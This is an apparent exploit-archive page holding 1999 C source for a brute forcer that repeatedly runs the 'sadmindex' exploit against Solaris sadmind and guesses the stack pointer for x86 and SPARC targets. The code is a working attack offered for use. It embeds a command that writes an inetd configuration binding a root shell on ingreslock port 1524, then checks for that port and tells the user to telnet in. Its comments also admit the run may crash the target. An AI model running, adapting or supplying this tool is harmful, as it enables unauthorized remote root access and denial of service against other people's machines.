Sadmind exploit stack pointer brute forcer, just ./sadmindex-brute-lux [arch] <host> and it will brute force the stack pointer, it'll output a message on success and open ingreslock (1524) on the remote computer. This brute forcer requires sadmind exploit by Cheez Whiz.
47d1a23069a0a1db17c1736077ea9a0d65c18f7e0bdfde9047857cbf06ed6867
// *** Synnergy Networks
// * Description:
//
// sadmind exploit stack pointer brute forcer.
// * Usage:
//
// # gcc -o sadmindex_brute-unix.c -o sadmindex_brute-unix
// # ./sadmindex_brute-unix [arch] <host>
// * Author:
//
// elux (elux@synnergy.net)
// Synnergy Networks (c) 1999, https://www.synnergy.net
// * Comments:
//
// This program is a demanding program since it needs other programs to funtion,
// and that is sadmindex exploit by Cheez Whiz. All it does is try numerous
// stack pointers; -2048 to 2048 the incrementation can be changed by the user,
// default is 4. Think of it this way if you have a 4 incremention you'll be
// connecting to the remote host 1024 times, unless you find the correct sp
// earlier, hence 2048 * 2 / 4 (4 is increment). Once the system finds the sp
// it will print the sp it used to break in and open ingreslock (1524), so just
// telnet to 1524 and your root, can it be any easier? By the way, you might to
// take into consideration that you might DoS the remote host so take it easy.
// *** Synnergy Networks
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
/* *** ATTENTION *** you may have to change some of these *** ATTENTION *** */
#define EXPX86 "sadmindex-x86" /* sadmind exploit for x86 arch */
#define EXPSPARC "sadmindex-sparc" /* sadmind exploit for sparc arch */
#define INC 4 /* sp brute forcing incrementation - 4 should be ok */
/* DON'T change the following */
#define FALSE 0 /* false */
#define TRUE !FALSE /* true */
#define BINDINGRES "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \
> /tmp/.x; /usr/sbin/inetd -s /tmp/.x; r\
m -f /tmp/.x;" /* bind rootshell */
#define SPX8626 0x080418ec /* default sadmindex sp for x86 2.6 */
#define SPX867 0x08041798 /* default sadmindex sp for x86 7.0 */
#define SPSPARC26 0xefff9580 /* default sadmindex sp for sparc 2.6 */
#define SPSPARC7 0xefff9418 /* default sadmindex sp for sparc 7.0 */
#define EXPCMDX8626 "./%s -h %s -c \"%s\" -s 0x%x -j 512\n" /* cmd line */
#define EXPCMDX867 "./%s -h %s -c \"%s\" -s 0x%x -j 536\n" /* cmd line */
#define EXPCMDSPARC "./%s -h %s -c \"%s\" -s 0x%x\n" /* cmd line */
int
main(int argc, char **argv)
{
int i, sockfd, fd, size = 4096, sign = -1;
long int addr;
char *buffer = (char *) malloc (size);
struct hostent *he;
struct sockaddr_in their_addr;
if (argc < 3)
{
fprintf(stderr, "\nsadmindex sp brute forcer - by elux\n");
fprintf(stderr, "usage: %s [arch] <host>\n\n", argv[0]);
fprintf(stderr, "\tarch:\n");
fprintf(stderr, "\t1 - x86 Solaris 2.6\n");
fprintf(stderr, "\t2 - x86 Solaris 7.0\n");
fprintf(stderr, "\t3 - SPARC Solaris 2.6\n");
fprintf(stderr, "\t4 - SPARC Solaris 7.0\n\n");
exit(TRUE);
}
if ( (he = gethostbyname(argv[2])) == NULL)
{
printf("Unable to resolve %s\n", argv[2]);
exit(TRUE);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(1524);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(their_addr.sin_zero), 8);
if ( (strcmp(argv[1], "1")) == 0)
{
addr = SPX8626;
printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n");
for (i = 0; i <= 4096; i += INC)
{
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1)
{
if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0)
{
fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]);
close(sockfd);
exit(FALSE);
}
}
if ( (fd = open(EXPX86, O_RDONLY)) != -1)
{
sign *= -1;
addr -= i *sign;
snprintf(buffer, size, EXPCMDX8626, EXPX86, argv[2], BINDINGRES, addr);
system(buffer);
}
else
{
printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPX86);
exit(TRUE);
}
}
}
else if ( (strcmp(argv[1], "2")) == 0)
{
addr = SPX867;
printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n");
for (i = 0; i <= 4096; i += INC)
{
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1)
{
if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0)
{
fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]);
close(sockfd);
exit(FALSE);
}
}
if ( (fd = open(EXPX86, O_RDONLY)) != -1)
{
sign *= -1;
addr -= i *sign;
snprintf(buffer, size, EXPCMDX867, EXPX86, argv[2], BINDINGRES, addr);
system(buffer);
}
else
{
printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPX86);
exit(TRUE);
}
}
}
else if ( (strcmp(argv[1], "3")) == 0)
{
addr = SPSPARC26;
printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n");
for (i = 0; i <= 4096; i += INC)
{
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1)
{
if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0)
{
fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]);
close(sockfd);
exit(FALSE);
}
}
if ( (fd = open(EXPSPARC, O_RDONLY)) != -1)
{
sign *= -1;
addr -= i *sign;
snprintf(buffer, size, EXPCMDSPARC, EXPSPARC, argv[2], BINDINGRES, addr);
system(buffer);
}
else
{
printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPSPARC);
exit(TRUE);
}
}
}
else if ( (strcmp(argv[1], "4")) == 0)
{
addr = SPSPARC7;
printf("\nAlright... sit back and relax while this program brute forces the sp.\n\n");
for (i = 0; i <= 4096; i += INC)
{
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) != -1)
{
if ( (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr))) == 0)
{
fprintf(stderr, "\n\nNow telnet to %s, on port 1524... be careful\n", argv[2]);
close(sockfd);
exit(FALSE);
}
}
if ( (fd = open(EXPSPARC, O_RDONLY)) != -1)
{
sign *= -1;
addr -= i *sign;
snprintf(buffer, size, EXPCMDSPARC, EXPSPARC, argv[2], BINDINGRES, addr);
system(buffer);
}
else
{
printf("\n\n%s doesn't exisit, you need the sadmindex exploit\n", EXPSPARC);
exit(TRUE);
}
}
}
else
printf("%s is not a supported arch, try 1 - 4 ... .. .\n", argv[1]);
}
// EOF